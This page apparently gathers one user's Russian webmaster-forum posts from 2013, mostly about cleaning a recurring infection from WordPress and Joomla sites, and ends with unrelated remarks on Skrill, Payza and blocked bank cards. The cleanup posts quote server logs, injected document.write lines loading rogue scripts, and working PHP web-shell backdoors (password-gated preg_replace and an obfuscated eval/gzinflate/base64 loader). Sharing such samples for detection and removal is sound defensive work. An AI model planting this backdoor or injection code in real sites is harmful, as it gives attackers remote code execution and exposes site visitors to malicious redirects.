Clausfehde

Clausfehde
Рейтинг
86
Регистрация
29.05.2009

Не могу сказать что получилось на 100% побороть этот вирус (js swf), но прибить его активность и вытащить сайты из кандалов гугла удалось. Я забыл как он называется, но можно выкачать зараженный swf файл и просканировать его Касперским - он скажет его название (Trojan/Redirect как-то так).

Что нужно сделать:

1) Открываем логи сервера (Access Log) и ищем строки:

178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 2 "-" "Mozilla/5.0

178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 44 "-" "Mozilla/5.0

XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET / HTTP/1.0" 200 41266 "-" "Mozilla/5.0

XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js HTTP/1.0" 200 32221 "-" "Mozilla/5.0

XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/crystal/jomama.swf HTTP/1.0" 200 39 "-" "Mozilla/5.0

178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 281 "-" "Mozilla/5.0

XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/smilies/galata.js HTTP/1.0" 200 39 "-" "Mozilla/5.0

178.33.69.67 - - [16/Dec/2013:08:03:29 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 45 "-" "Mozilla/5.0

Внимание! Название файлов и директорий у каждого будет разная, в моем случае было так. Найти нужные логи можно с помощью Notepad++, искать можно по слову swf (я так делал).

2) Удаляем вредоносные файлы. Обязательно найти и удалить php, js, swf файлы, у меня это были:

set-post-thumbnail.dev.php

jomama.swf

galata.js

И удалить кусок вредоносного кода из одного из js файлов сайта, в моем случае это был файл highslide-with-html.packed.js и в нем был такой код:

;document.write("<scr"+"ipt src='/wp-includes/images/smilies/galata.js'><"+"/script>");

3) Ставим права на папки 555

4) После проделанных процедур просматриваем логи (1-2 раза в сутки). Ищем по ключу swf, и будем видеть создаются ли опять вредоносные файлы.

Могу сказать что десктопные антивирусы детектят только файл swf как вирус и то не все. ESS у меня молчал, скачал Kaspersky - он ругнулся. Еще хочу обозначить внимание на php файле, его обязательно нужно найти и удалить. Возможно все это полумера, но мне помогло. Дальше будем видеть.

ProLiant:
В общем, вчера удалил это все, сегодня снова на месте: в uploads/posts в разных папках сидели conn.js и rusty.swf, а также в engine/classes/js/ в этот раз дописка в jqueryui.js ... :) Может еще где-что есть, пока не знаю.

Еще ищи php файл. Если посмотреть в логах он вызывается методом POST по времени совпадает с остальными (js swf). У меня компания из 3 файлов (php swf js) + один из js файлов имеет вредоносную строчку.

Да... и еще. Если раньше php файл имел код такого вида:

<?php
if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}

То теперь он такой (я его укоротил, он очень огромный, там идет что-то зашифровано). Тут какой-то пароль... чем его декодировать?

$auth_pass='2e6c97b5a295c6cdce39d2694a5a614d';preg_replace(/./".'e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105)
.chr(110).chr(102).chr(108).chr(97)
.chr(116).chr(101).chr(40).chr(98).chr(97).chr(115).chr(101).
chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39)."7X1re9pG0/Dn5lesVVp...../Ag==\x27\x29\x29\x29\x3b",".");

Удалил сегодня файл .php, .swf, .js и убил код который дописался в один из js файлов сайта, не помогло. Опять всей братией появились. Новые файлы с новыми названиями. Пока что заметил, что появляется 3 файла (php swf js) и кусок кода в одном из js скриптов, ничего другого больше найти не смог. Где этот вирус\шелл ума не приложу. Склоняюсь больше к тому что это дырка не в движке сайта или плагинах, это где-то на сервере.

ProLiant, попробуй поискать в логах .swf

SergPolyak, посмотрите содержимое файла /modules/comment/comment-wrapper.tpl1.php

Я подозреваю что оригинальный файл должен быть такой:

/modules/comment/comment-wrapper.tpl.php

Т.е. без цифры 1. Хотя могу ошибаться, с друпалом не работал.

Такая же участь настигла мои сайты (2 WP, 1 Joomla), все на одном VPS. Вчера обновил движки сайтов до последних версий. Создается 2 файла, всегда с разными именами: к примеру blac.js и melbourne.swf и кусок кода прописывается в какой-нибудь из .js файлов к примеру в jquery.js нашел:

;document.write("<scr"+"ipt src='/administrator/help/en-GB/blac.js'><"+"/script>");

Файлы создаются в разных местах с разными именами. На Джумле поставил права на папки 555. Со вчерашнего дня смотрю логи сервера: для джумлы пока вирусных файлов не появлялось, а для WP уже по 2 -3 раза появлялись с разными именами. Расскажите как искать шелл, смотрю тут у некоторых файлы php появлялись еще, в которых вероятно и есть шелл, у себя пока найти не смог их. Писать хостеру? Сейчас запустил сканирование каспером, ESS на ПК ничего не нашел. В ФТП пароли сменил и убрал их из файлзиллы. Куда копать? Менять права на файлы WP на 444? Буду благодарен любой помощи.

Только что заметил:

Есть файл в WP. Этот файл должен быть в WP?

/wp-admin/js/set-post-thumbnail.dev.php

Вот еще логи сервера для сайта на WP:



178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 2 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET / HTTP/1.0" 200 41266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js HTTP/1.0" 200 32221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/crystal/jomama.swf HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [16/Dec/2013:08:03:27 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 281 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [16/Dec/2013:08:03:28 +0400] "GET /wp-includes/images/smilies/galata.js HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
178.33.69.67 - - [16/Dec/2013:08:03:29 +0400] "POST /wp-admin/js/set-post-thumbnail.dev.php HTTP/1.0" 200 45 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)

XX.X.199.200 - IP моего сервера

Далее проверил логи сервера для сайта на Джумле:

XX.X.199.200- - [15/Dec/2013:00:57:57 +0400] "GET /administrator/images/nyla.swf HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
XX.X.199.200 - - [15/Dec/2013:00:57:57 +0400] "GET /includes/js/tabs/mememe.js HTTP/1.0" 200 39 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [15/Dec/2013:00:57:53 +0400] "POST /administrator/images/bookmarks.php HTTP/1.0" 200 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)
178.33.69.67 - - [15/Dec/2013:00:57:57 +0400] "POST /administrator/images/bookmarks.php HTTP/1.0" 200 45 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3)

Нашел файл: /administrator/images/bookmarks.php

Вот содержимое подозрительных файлов:

/administrator/images/bookmarks.php

<?php
if (md5($_POST['p']) == 'd1873f535de1bfbcb586ad2c830adec9') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}

/wp-admin/js/set-post-thumbnail.dev.php

<?php
if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}

Как видно, код практически совпадает... Подскажите пожалуйста, это шелл?

Andreyka:
Moneybookers (Skrill) - мертвый, я открыл тикет - за месяц ответ не получил. Plinus связан с ними - так что тоже не вариант.

Остается Payza.

Странно, мне казалось что Skrill достойная организация.

Moneybookers, Payza может подойдет

sutki:
Она врет! Такого не может быть.

Тоже спрашивал про счет 2625, сказали что счет не заблокирован, только карта.

molom:
а позже кому-нибудь блокировали?

У меня заблокировали вчера или сегодня, точно не могу сказать. В субботу еще снимал в банкомате, в воскресение думаю еще активна была т.к. выходной.

Всего: 492